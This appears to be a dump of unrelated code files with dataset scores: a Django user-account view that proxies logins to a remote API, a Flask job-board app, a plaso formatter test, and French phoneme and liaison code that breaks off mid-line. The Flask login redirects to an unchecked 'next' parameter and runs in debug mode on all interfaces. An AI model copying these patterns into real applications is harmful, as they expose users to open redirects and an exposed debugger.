""" if 'session_id' in request.COOKIES: return render(request, "users/logout.html") else: if request.method == "POST": url = url_root + '/users/login' userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), } headers = { 'user-agent': request.META['HTTP_USER_AGENT'], } resp = requests.post(url, data=userdata, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect('/') parser = resp.headers['Set-Cookie'] expires = parser[65:94] response.set_cookie('session_id', resp.headers['Set-Cookie'], expires=expires) return response else : object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/login.html") def logout(request): """ User logout function. is available to the user only with the correct data cookie value Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: response = redirect("/") response.delete_cookie("session_id") return response else: return HttpResponse("err") def new_users(request): """ Сreate new user function sends a password and email to the database fields email, password, first_name, last_name, tel_num, about from the template "users/new_users.html" Args: request : request, cleaned stores the information about the session """ if request.method == "POST": url = url_root + '/users/new' userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), 'first_name': request.POST.get("first_name"), 'last_name': request.POST.get("last_name"), 'tel_number': request.POST.get("tel_num"), 'about': request.POST.get("about"), } headers = { 'user-agent': request.META['HTTP_USER_AGENT'], } resp = requests.post(url, data=userdata, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect('/') return response else : object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/new_users.html", ) def info(request): """ User information function. is available to the user only with the correct data cookie value function that provides information about the registered account (own account) takes json json example : { "id": 123456, "first_name": "Random", "last_name": "Valerka", "email": "<EMAIL>", "tel_number": "1-234-56-78", "about": "Some information about this man", "time_reg": "2012.10.1 15:34:41" } Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.get(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : return render(request, "users/info.html", resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return redirect('/users/login/') def update(request): """ User update function. is available to the user only with the correct data cookie value sends a password and email to the database fields email, password, first_name, last_name, tel_num, about from the template "users/update.html" at get request it requests the same json as in "def info(request)" Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: if request.method == "POST": userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), 'first_name': request.POST.get("first_name"), 'last_name': request.POST.get("last_name"), 'tel_number': request.POST.get("tel_num"), 'about': request.POST.get("about"), } url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.post(url, headers=headers, data=userdata) if (resp.status_code >= 200) and (resp.status_code<=300) : resp = requests.get(url, headers=headers) return render(request, "users/info.html", resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.get(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : return render(request, "users/update.html", resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else : return redirect('/users/login/')
users/views.py
from django.shortcuts import render from django.http import HttpResponseRedirect from .models import registration from django.http import HttpResponse from django.shortcuts import redirect import requests # base url database url_root = 'https://search-build.herokuapp.com' def delete(request): """ User delete function. is available to the user only with the correct data cookie value Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: if request.method =="POST": url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.delete(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect("/") response.delete_cookie("session_id") return response else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/delete.html") else: return redirect("/users/login/") def login(request): """ User login function. sends a password and email to the database for comparison, receives a cookie in return "session_id" Args: request : request, cleaned stores the information about the session Returns: render "users/logout.html" if the user is already with cookies render "users/login.html" if the user is without cookies """ if 'session_id' in request.COOKIES: return render(request, "users/logout.html") else: if request.method == "POST": url = url_root + '/users/login' userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), } headers = { 'user-agent': request.META['HTTP_USER_AGENT'], } resp = requests.post(url, data=userdata, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect('/') parser = resp.headers['Set-Cookie'] expires = parser[65:94] response.set_cookie('session_id', resp.headers['Set-Cookie'], expires=expires) return response else : object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/login.html") def logout(request): """ User logout function. is available to the user only with the correct data cookie value Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: response = redirect("/") response.delete_cookie("session_id") return response else: return HttpResponse("err") def new_users(request): """ Сreate new user function sends a password and email to the database fields email, password, first_name, last_name, tel_num, about from the template "users/new_users.html" Args: request : request, cleaned stores the information about the session """ if request.method == "POST": url = url_root + '/users/new' userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), 'first_name': request.POST.get("first_name"), 'last_name': request.POST.get("last_name"), 'tel_number': request.POST.get("tel_num"), 'about': request.POST.get("about"), } headers = { 'user-agent': request.META['HTTP_USER_AGENT'], } resp = requests.post(url, data=userdata, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect('/') return response else : object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/new_users.html", ) def info(request): """ User information function. is available to the user only with the correct data cookie value function that provides information about the registered account (own account) takes json json example : { "id": 123456, "first_name": "Random", "last_name": "Valerka", "email": "<EMAIL>", "tel_number": "1-234-56-78", "about": "Some information about this man", "time_reg": "2012.10.1 15:34:41" } Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.get(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : return render(request, "users/info.html", resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return redirect('/users/login/') def update(request): """ User update function. is available to the user only with the correct data cookie value sends a password and email to the database fields email, password, first_name, last_name, tel_num, about from the template "users/update.html" at get request it requests the same json as in "def info(request)" Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: if request.method == "POST": userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), 'first_name': request.POST.get("first_name"), 'last_name': request.POST.get("last_name"), 'tel_number': request.POST.get("tel_num"), 'about': request.POST.get("about"), } url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.post(url, headers=headers, data=userdata) if (resp.status_code >= 200) and (resp.status_code<=300) : resp = requests.get(url, headers=headers) return render(request, "users/info.html", resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.get(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : return render(request, "users/update.html", resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else : return redirect('/users/login/')
0.502197
0.075176
import os from datetime import datetime from urlparse import urlparse from flask import Flask, render_template, request, redirect, url_for, flash, session from flaskext.seasurf import SeaSurf from flaskext.bcrypt import Bcrypt from flaskext.gravatar import Gravatar from functools import wraps import settings from mongoengine import connect, Document, StringField, EmailField, DateTimeField, URLField app = Flask(__name__) app.config.from_object(settings) csrf = SeaSurf(app) bcrypt = Bcrypt(app) gravatar = Gravatar(app, size=160, default='mm') database = urlparse(os.environ.get('MONGOHQ_URL', 'mongodb://localhost/flask-job-board')) connect(database.path[1:], host=database.hostname, port=database.port, username=database.username, password=<PASSWORD>) class User(Document): username = StringField(required=True) email = EmailField(required=True) first_name = StringField(max_length=50) last_name = StringField(max_length=50) location = StringField() homepage = StringField() passhash = StringField() created = DateTimeField() meta = { 'ordering': ['-created'] } class Job(Document): company_name = StringField(required=True) company_location = StringField(required=True) company_url = URLField(required=True) job_title = StringField(required=True) job_posting = StringField(required=True) application_instructions = StringField(required=True) created = DateTimeField() meta = { 'ordering': ['-created'] } def login_required(f): @wraps(f) def decorated_function(*args, **kwargs): if session.get("logged_in"): return f(*args, **kwargs) else: flash(u'Login is required.', 'warning') return redirect(url_for('login', next=request.url)) return decorated_function @app.template_filter() def timesince(dt, default="just now"): """ Returns string representing "time since" e.g. 3 days ago, 5 hours ago etc. """ now = datetime.utcnow() diff = now - dt periods = ( (diff.days / 365, "year", "years"), (diff.days / 30, "month", "months"), (diff.days / 7, "week", "weeks"), (diff.days, "day", "days"), (diff.seconds / 3600, "hour", "hours"), (diff.seconds / 60, "minute", "minutes"), (diff.seconds, "second", "seconds"), ) for period, singular, plural in periods: if period: return "%d %s ago" % (period, singular if period == 1 else plural) return default @app.route("/") def home(): jobs = Job.objects.all() return render_template('home.html', jobs=jobs) @app.route('/about') def about(): return render_template('about.html') @app.route('/contact') def contact(): return render_template('contact.html') @app.route('/create', methods=['GET', 'POST']) @login_required def create_job(): if request.method == 'POST': job = Job(company_name=request.form['company_name']) job.company_location=request.form['company_location'] company_url=request.form['company_url'] if company_url[:4] == 'http': job.company_url=company_url else: job.company_url='http://'+company_url job.job_title=request.form['job_title'] job.job_posting=request.form['job_posting'] job.application_instructions=request.form['application_instructions'] job.created=datetime.utcnow() job.save() next_url = job.id flash(u'Job successfully created.', 'success') return redirect(url_for('show_job', job_id=next_url)) else: return render_template('create_job.html') @app.route('/signup', methods=['GET', 'POST']) def signin(): if request.method == 'POST': if request.form['password'] == request.form['password2']: user = User(username=request.form['username']) user.email=request.form['email'] user.first_name=request.form['first_name'] user.last_name=request.form['last_name'] user.location='None' user.passhash=<PASSWORD>.generate_password_hash(request.form['password']) user.homepage='None' user.created=datetime.utcnow() user.save() user_id=user.id session['username'] = user.username session['logged_in'] = True flash(u'Successfully created new user.', 'success') return redirect(url_for('show_user', user_id=user_id)) else: flash(u'Passwords do not match.', 'error') return render_template('create_user.html') else: return render_template('create_user.html') @app.route('/login', methods=['GET', 'POST']) def login(): next = request.values.get('next', '') if request.method == 'POST': try: user = User.objects.get(username=request.form['username']) except User.DoesNotExist: flash(u'Password or Username is incorrect.', 'error') return render_template('login.html') else: if not bcrypt.check_password_hash(user.passhash, request.form['password']): flash(u'Password or Username is incorrect.', 'error') return render_template('login.html') else: session['username'] = user.username session['logged_in'] = True flash(u'You have been successfully logged in.', 'success') return redirect(next or url_for('home')) return render_template('login.html') @app.route('/logout') def logout(): session.pop('username', None) session.pop('logged_in', None) flash(u'You have been successfully logged out.', 'info') return redirect(url_for('home')) @app.route('/settings', methods=['GET', 'POST']) @login_required def settings(): if request.method == 'POST': user=User.objects.get(username=session.get('username')) user.email=request.form['email'] user.first_name=request.form['first_name'] user.last_name=request.form['last_name'] user.location=request.form['location'] user.homepage=request.form['homepage'] user.save() user_id=user.id flash(u'Profile was successfully updated.', 'success') return redirect(url_for('show_user', user_id=user_id)) else: user=User.objects.get(username=session.get('username')) return render_template('settings.html', user=user) @app.route('/user/<user_id>') def show_user(user_id): user = User.objects.with_id(user_id) return render_template('show_user.html', user=user) @app.route('/job/<job_id>') def show_job(job_id): job = Job.objects.with_id(job_id) return render_template('show_job.html', job=job) @app.route('/users') def show_all_users(): users = User.objects.all() return render_template('show_all_users.html', users=users) @app.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 if __name__ == "__main__": port = int(os.environ.get("PORT", 5000)) app.debug = True app.run(host='0.0.0.0', port=port)
flask-job-board/app.py
import os from datetime import datetime from urlparse import urlparse from flask import Flask, render_template, request, redirect, url_for, flash, session from flaskext.seasurf import SeaSurf from flaskext.bcrypt import Bcrypt from flaskext.gravatar import Gravatar from functools import wraps import settings from mongoengine import connect, Document, StringField, EmailField, DateTimeField, URLField app = Flask(__name__) app.config.from_object(settings) csrf = SeaSurf(app) bcrypt = Bcrypt(app) gravatar = Gravatar(app, size=160, default='mm') database = urlparse(os.environ.get('MONGOHQ_URL', 'mongodb://localhost/flask-job-board')) connect(database.path[1:], host=database.hostname, port=database.port, username=database.username, password=<PASSWORD>) class User(Document): username = StringField(required=True) email = EmailField(required=True) first_name = StringField(max_length=50) last_name = StringField(max_length=50) location = StringField() homepage = StringField() passhash = StringField() created = DateTimeField() meta = { 'ordering': ['-created'] } class Job(Document): company_name = StringField(required=True) company_location = StringField(required=True) company_url = URLField(required=True) job_title = StringField(required=True) job_posting = StringField(required=True) application_instructions = StringField(required=True) created = DateTimeField() meta = { 'ordering': ['-created'] } def login_required(f): @wraps(f) def decorated_function(*args, **kwargs): if session.get("logged_in"): return f(*args, **kwargs) else: flash(u'Login is required.', 'warning') return redirect(url_for('login', next=request.url)) return decorated_function @app.template_filter() def timesince(dt, default="just now"): """ Returns string representing "time since" e.g. 3 days ago, 5 hours ago etc. """ now = datetime.utcnow() diff = now - dt periods = ( (diff.days / 365, "year", "years"), (diff.days / 30, "month", "months"), (diff.days / 7, "week", "weeks"), (diff.days, "day", "days"), (diff.seconds / 3600, "hour", "hours"), (diff.seconds / 60, "minute", "minutes"), (diff.seconds, "second", "seconds"), ) for period, singular, plural in periods: if period: return "%d %s ago" % (period, singular if period == 1 else plural) return default @app.route("/") def home(): jobs = Job.objects.all() return render_template('home.html', jobs=jobs) @app.route('/about') def about(): return render_template('about.html') @app.route('/contact') def contact(): return render_template('contact.html') @app.route('/create', methods=['GET', 'POST']) @login_required def create_job(): if request.method == 'POST': job = Job(company_name=request.form['company_name']) job.company_location=request.form['company_location'] company_url=request.form['company_url'] if company_url[:4] == 'http': job.company_url=company_url else: job.company_url='http://'+company_url job.job_title=request.form['job_title'] job.job_posting=request.form['job_posting'] job.application_instructions=request.form['application_instructions'] job.created=datetime.utcnow() job.save() next_url = job.id flash(u'Job successfully created.', 'success') return redirect(url_for('show_job', job_id=next_url)) else: return render_template('create_job.html') @app.route('/signup', methods=['GET', 'POST']) def signin(): if request.method == 'POST': if request.form['password'] == request.form['password2']: user = User(username=request.form['username']) user.email=request.form['email'] user.first_name=request.form['first_name'] user.last_name=request.form['last_name'] user.location='None' user.passhash=<PASSWORD>.generate_password_hash(request.form['password']) user.homepage='None' user.created=datetime.utcnow() user.save() user_id=user.id session['username'] = user.username session['logged_in'] = True flash(u'Successfully created new user.', 'success') return redirect(url_for('show_user', user_id=user_id)) else: flash(u'Passwords do not match.', 'error') return render_template('create_user.html') else: return render_template('create_user.html') @app.route('/login', methods=['GET', 'POST']) def login(): next = request.values.get('next', '') if request.method == 'POST': try: user = User.objects.get(username=request.form['username']) except User.DoesNotExist: flash(u'Password or Username is incorrect.', 'error') return render_template('login.html') else: if not bcrypt.check_password_hash(user.passhash, request.form['password']): flash(u'Password or Username is incorrect.', 'error') return render_template('login.html') else: session['username'] = user.username session['logged_in'] = True flash(u'You have been successfully logged in.', 'success') return redirect(next or url_for('home')) return render_template('login.html') @app.route('/logout') def logout(): session.pop('username', None) session.pop('logged_in', None) flash(u'You have been successfully logged out.', 'info') return redirect(url_for('home')) @app.route('/settings', methods=['GET', 'POST']) @login_required def settings(): if request.method == 'POST': user=User.objects.get(username=session.get('username')) user.email=request.form['email'] user.first_name=request.form['first_name'] user.last_name=request.form['last_name'] user.location=request.form['location'] user.homepage=request.form['homepage'] user.save() user_id=user.id flash(u'Profile was successfully updated.', 'success') return redirect(url_for('show_user', user_id=user_id)) else: user=User.objects.get(username=session.get('username')) return render_template('settings.html', user=user) @app.route('/user/<user_id>') def show_user(user_id): user = User.objects.with_id(user_id) return render_template('show_user.html', user=user) @app.route('/job/<job_id>') def show_job(job_id): job = Job.objects.with_id(job_id) return render_template('show_job.html', job=job) @app.route('/users') def show_all_users(): users = User.objects.all() return render_template('show_all_users.html', users=users) @app.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 if __name__ == "__main__": port = int(os.environ.get("PORT", 5000)) app.debug = True app.run(host='0.0.0.0', port=port)
0.361954
0.065009
"""Tests for plaso.output.l2t_csv.""" import StringIO import unittest from plaso.formatters import interface as formatters_interface from plaso.lib import event from plaso.lib import eventdata from plaso.output import dynamic class TestEvent(event.EventObject): DATA_TYPE = 'test:dynamic' def __init__(self): super(TestEvent, self).__init__() self.timestamp = 1340821021000000 self.timestamp_desc = eventdata.EventTimestamp.CHANGE_TIME self.hostname = 'ubuntu' self.filename = 'log/syslog.1' self.text = ( u'Reporter <CRON> PID: 8442 (pam_unix(cron:session): session\n ' u'closed for user root)') class TestEventFormatter(formatters_interface.EventFormatter): DATA_TYPE = 'test:dynamic' FORMAT_STRING = u'{text}' SOURCE_SHORT = 'LOG' SOURCE_LONG = 'Syslog' class FakeFilter(object): """Provide a fake filter, that defines which fields to use.""" def __init__(self, fields, separator=u','): self.fields = fields self.separator = separator class DynamicTest(unittest.TestCase): """Test the dynamic output module.""" def testHeader(self): output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output) correct_line = ( 'datetime,timestamp_desc,source,source_long,message,parser,' 'display_name,tag,store_number,store_index\n') formatter.Start() self.assertEquals(output.getvalue(), correct_line) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'message', 'hostname', 'filename', 'some_stuff'])) correct_line = 'date,time,message,hostname,filename,some_stuff\n' formatter.Start() self.assertEquals(output.getvalue(), correct_line) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'message', 'hostname', 'filename', 'some_stuff'], '@')) correct_line = 'date@time@message@hostname@filename@some_stuff\n' formatter.Start() self.assertEquals(output.getvalue(), correct_line) def testEventBody(self): """Test ensures that returned lines returned are fmt CSV as expected.""" event_object = TestEvent() output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'timezone', 'macb', 'source', 'sourcetype', 'type', 'user', 'host', 'message_short', 'message', 'filename', 'inode', 'notes', 'format', 'extra'])) formatter.Start() header = ( 'date,time,timezone,macb,source,sourcetype,type,user,host,' 'message_short,message,filename,inode,notes,format,extra\n') self.assertEquals(output.getvalue(), header) formatter.EventBody(event_object) correct = ( '2012-06-27,18:17:01,UTC,..C.,LOG,Syslog,Metadata Modification Time,-,' 'ubuntu,Reporter <CRON> PID: 8442 (pam_unix(cron:session): session ' 'closed for user root),Reporter <CRON> PID: 8442 ' '(pam_unix(cron:session): session closed for user root),log/syslog.1' ',-,-,-,-\n') self.assertEquals(output.getvalue(), header + correct) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['datetime', 'nonsense', 'hostname', 'message'])) header = 'datetime,nonsense,hostname,message\n' formatter.Start() self.assertEquals(output.getvalue(), header) correct = ( '2012-06-27T18:17:01+00:00,-,ubuntu,Reporter <CRON> PID: 8442' ' (pam_unix(cron:session): session closed for user root)\n') formatter.EventBody(event_object) self.assertEquals(output.getvalue(), header + correct) if __name__ == '__main__': unittest.main()
plaso/output/dynamic_test.py
"""Tests for plaso.output.l2t_csv.""" import StringIO import unittest from plaso.formatters import interface as formatters_interface from plaso.lib import event from plaso.lib import eventdata from plaso.output import dynamic class TestEvent(event.EventObject): DATA_TYPE = 'test:dynamic' def __init__(self): super(TestEvent, self).__init__() self.timestamp = 1340821021000000 self.timestamp_desc = eventdata.EventTimestamp.CHANGE_TIME self.hostname = 'ubuntu' self.filename = 'log/syslog.1' self.text = ( u'Reporter <CRON> PID: 8442 (pam_unix(cron:session): session\n ' u'closed for user root)') class TestEventFormatter(formatters_interface.EventFormatter): DATA_TYPE = 'test:dynamic' FORMAT_STRING = u'{text}' SOURCE_SHORT = 'LOG' SOURCE_LONG = 'Syslog' class FakeFilter(object): """Provide a fake filter, that defines which fields to use.""" def __init__(self, fields, separator=u','): self.fields = fields self.separator = separator class DynamicTest(unittest.TestCase): """Test the dynamic output module.""" def testHeader(self): output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output) correct_line = ( 'datetime,timestamp_desc,source,source_long,message,parser,' 'display_name,tag,store_number,store_index\n') formatter.Start() self.assertEquals(output.getvalue(), correct_line) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'message', 'hostname', 'filename', 'some_stuff'])) correct_line = 'date,time,message,hostname,filename,some_stuff\n' formatter.Start() self.assertEquals(output.getvalue(), correct_line) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'message', 'hostname', 'filename', 'some_stuff'], '@')) correct_line = 'date@time@message@hostname@filename@some_stuff\n' formatter.Start() self.assertEquals(output.getvalue(), correct_line) def testEventBody(self): """Test ensures that returned lines returned are fmt CSV as expected.""" event_object = TestEvent() output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'timezone', 'macb', 'source', 'sourcetype', 'type', 'user', 'host', 'message_short', 'message', 'filename', 'inode', 'notes', 'format', 'extra'])) formatter.Start() header = ( 'date,time,timezone,macb,source,sourcetype,type,user,host,' 'message_short,message,filename,inode,notes,format,extra\n') self.assertEquals(output.getvalue(), header) formatter.EventBody(event_object) correct = ( '2012-06-27,18:17:01,UTC,..C.,LOG,Syslog,Metadata Modification Time,-,' 'ubuntu,Reporter <CRON> PID: 8442 (pam_unix(cron:session): session ' 'closed for user root),Reporter <CRON> PID: 8442 ' '(pam_unix(cron:session): session closed for user root),log/syslog.1' ',-,-,-,-\n') self.assertEquals(output.getvalue(), header + correct) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['datetime', 'nonsense', 'hostname', 'message'])) header = 'datetime,nonsense,hostname,message\n' formatter.Start() self.assertEquals(output.getvalue(), header) correct = ( '2012-06-27T18:17:01+00:00,-,ubuntu,Reporter <CRON> PID: 8442' ' (pam_unix(cron:session): session closed for user root)\n') formatter.EventBody(event_object) self.assertEquals(output.getvalue(), header + correct) if __name__ == '__main__': unittest.main()
0.630344
0.252316
from trad_chiffre_mot import tradn import os import numpy as np from scipy.sparse import csr_matrix import pandas as pd from nltk.tag import StanfordPOSTagger from nltk.tokenize import RegexpTokenizer from keras import Input from keras.layers import Bidirectional, LSTM, Dropout, RepeatVector, Concatenate, Dense, Activation, Dot, GRU from keras.models import Model from keras.optimizers import Adam from sklearn.model_selection import train_test_split def filter_length(df, n=8, phon="2_phon", sup_n=True): phonemes = df.loc[:, phon] if sup_n: filtre = phonemes.apply(lambda x: len(x) >= n) else: filtre = phonemes.apply(lambda x: len(x) < n) return df.loc[filtre, :] def sample(df, m=1000, mots="1_ortho", phon="2_phon", occurances="10_freqlivres", ln_dist=False, seed=23): """ :param df: pd.dataframe contenant le lexique :param mots: "1_ortho" variable de df contenant les orthographes :param phon: "2_phon" variable de df contenant les phonemes :param occurances: "10_freqlivres" variable de df contenant les frequences des mots :param ln_dist: False passage au log :param m: 1000 taille des donnees :param seed: graine aleatoire de l'echantillonage :return: liste de tuples (mot, prononciation), liste contenant les probabilités """ list_w2p = [] list_occ = [] for row in df[[mots, phon, occurances]].to_numpy(): w, p, o = tuple(row) list_w2p.append([w, p]) list_occ.append(o) list_occ = np.array(list_occ) # normalisation if ln_dist: list_occ = np.log(list_occ + 1) list_occ = list_occ / np.sum(list_occ) # format liste list_tuples = [tuple(couple) for couple in list_w2p] list_occ = list_occ.tolist() n_occ = len(list_tuples) np.random.seed(seed) distr = np.random.choice(a=range(n_occ), size=m, p=list_occ).tolist() return [list_tuples[i] for i in distr] def train_dev(df, test_size=0.01, m=1000, forced_train=None, mots="1_ortho", phon="2_phon", occurances="10_freqlivres", ln_dist=False, seed=23): """ :param df: pd.dataframe contenant le lexique :param test_size: 0.01 :param m: 1000 taille des donnees de train :param forced_train: liste de mots a avoir dans les donnees d'entrainement :param mots: "1_ortho" variable de df contenant les orthographes :param phon: "2_phon" variable de df contenant les phonemes :param occurances: "10_freqlivres" variable de df contenant les frequences des mots :param ln_dist: False passage au log :param seed: graine aleatoire du train_test_split et de l'echantillonage :return: listes de tuples des train """ if forced_train is None: forced_train = [] train_df, test_df = train_test_split(df, test_size=test_size, random_state=seed) if len(forced_train) > 0: # rajout des mots dans les donnees de test forced_idx = test_df[mots].apply(lambda x: x in forced_train) forced = test_df.loc[forced_idx, :] train_df = train_df.append(forced, ignore_index=True) test_df = test_df.loc[-forced_idx, :] train_s = sample(train_df, m=m, mots=mots, phon=phon, occurances=occurances, ln_dist=ln_dist, seed=seed) test_s = sample(test_df, m=int(m * test_size), mots=mots, phon=phon, occurances=occurances, ln_dist=ln_dist, seed=seed) return train_s, test_s def model_test(tx, ty, n_l, n_p, n_brnn1=32, n_h1=64): x = Input(shape=(tx, n_l)) c0 = Input(shape=(n_h1,), name='c0') h0 = Input(shape=(n_h1,), name='h0') c = c0 h = h0 outputs = list() # initialisation de la derniere couche # c'est parti a = Bidirectional(LSTM(units=n_brnn1, return_sequences=True, name="LSTM_mot"))(x) a = Dropout(0.2, name="dropout_LSTM_orthographe")(a) for t in range(ty): # Attention h_rep = RepeatVector(tx, name="att_repeat_phoneme{}".format(t))(h) ah = Concatenate(axis=-1, name="att_concat_phoneme{}".format(t))([h_rep, a]) energies = Dense(units=n_h1, activation="tanh", name="att_caractere_phoneme{}".format(t))(ah) energies = Dense(units=1, activation="relu", name="att_moyenne_phoneme{}".format(t))(energies) alpha = Activation("softmax", name="att_alpha_phoneme{}".format(t))(energies) context = Dot(axes=1, name="att_application_phoneme{}".format(t))([alpha, a]) h, c = GRU(units=n_h1, activation='tanh', recurrent_activation='tanh', return_state=True, name="LSTM_phoneme{}".format(t))(inputs=context, initial_state=c) h = Dropout(rate=0.1, name="dropout_phoneme{}".format(t))(h) c = Dropout(rate=0.1, name="dropout_memory_phoneme{}".format(t))(c) outy = Dense(activation="softmax", units=n_p, name="LSTM_{}".format(t))(h) outputs.append(outy) net = Model(inputs=[x, c0, h0], outputs=outputs) return net def pos_tag(mots, jar=os.path.join(".", "models", "stanford-postagger", "stanford-postagger-3.8.0.jar"), mdl=os.path.join(".", "models", "stanford-postagger", "french-ud.tagger")): try: pos_tagger = StanfordPOSTagger(mdl, jar, encoding='utf8') except LookupError: java_path = r"C:\Program Files (x86)\Java\jre1.8.0_261\bin\java.exe" os.environ['JAVAHOME'] = java_path pos_tagger = StanfordPOSTagger(mdl, jar, encoding='utf8') tagged = pos_tagger.tag(mots) tags = [g for m, g in tagged] forced_det = ["au", "aux"] absent_of_table = ["PART", "SCONJ"] if any(item in mots for item in forced_det) or any(item in tags for item in absent_of_table): for i, couple in enumerate(tagged): mot = couple[0] gram = couple[1] if mot in forced_det: tagged[i] = (mot, "DET") if gram == "PART": tagged[i] = (mot, "ADV") if gram == "SCONJ": tagged[i] = (mot, "CONJ") return tagged def check_liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs): """ Fonction qui verifie si la liaison est possible entre deux mots :param ortho1: orthographe du mot en position 1 :param ortho2: orthographe du mot en position 2 :param phon1: phonemes du mot en position 1 :param phon2: phonemes du mot en position 2 :param nat1: nature du mot en position 1 :param nat2: nature du mot en position 2 :param phrase: phrase de contexte :return: booleen sur la possibilite de liaison """ voyelles_p = kwargs.get("voyelles_p", ['a', 'E', '§', 'o', 'O', '1', 'i', '5', 'e', 'u', '@', '°', '9', 'y', '2']) y_p = kwargs.get("y_p", ['w', 'j', '8']) consonnes_liaisons = {'d': ['d'], 'p': ["p"], 'r': ["R"], 's': ['s', 'z'], 't': ['t'], 'x': ['s', 'z'], 'n': ['n', 'G'], 'z': ['z', 's']} liables = False mot2_voyelle = ((phon2[0] in y_p) or (phon2[0] in voyelles_p)) and (ortho2[0] != 'h') if mot2_voyelle: mot1_consonne_liaison = (ortho1[-1] in consonnes_liaisons.keys()) and\ (phon1[-1] not in consonnes_liaisons[ortho1[-1]]) if mot1_consonne_liaison: mot1_dern_son_voyelle = (ortho1[-1] in consonnes_liaisons.keys()) and (phon1[-1] in voyelles_p) pas_ponctuation = (" ".join([ortho1, ortho2]) in phrase) or ("-".join([ortho1, ortho2]) in phrase) if pas_ponctuation: if (nat1 in ["NUM", "DET", "ADJ"]) and (nat2 in ["NOUN", "PROPN"]): liables = True elif ortho1 in ["on", "nous", "vous", "ils", "elles", "en", "tout"] and nat2 in ["AUX", "VERB"]: liables = True elif nat1 in ["AUX", "VERB"] and mot1_dern_son_voyelle: liables = True elif nat1 in ["ADP"]: liables = True elif (nat1 in ["NOUN"]) and (ortho1[-1] in ['s']) and (nat2 in ["ADJ"]): liables = True elif (nat1 == "ADV") and (nat2 in ["ADV", "ADJ", "NOUN"]): liables = True elif (ortho1 == "quand") and (nat2 not in ["AUX", "VERB"]): liables = True elif (ortho1 == "plus") and (ortho2 == "ou"): liables = True elif (ortho1 == "tout") and (ortho2 in ["à", "autour"]): liables = True return liables def liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs): dico_liaisons_simples = kwargs.get("dico_liaisons", {'d': 't', 'p': 'p', 's': 'z', 't': 't', 'x': 'z', 'z': 'z'}) mots_nasale_simples = kwargs.get("mots_nasale_simples", ["aucun", "bien", "en", "on", "rien", "un", "non", "mon", "ton", "son"]) liaison_a_faire = check_liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs) if liaison_a_faire: derniere_lettre = 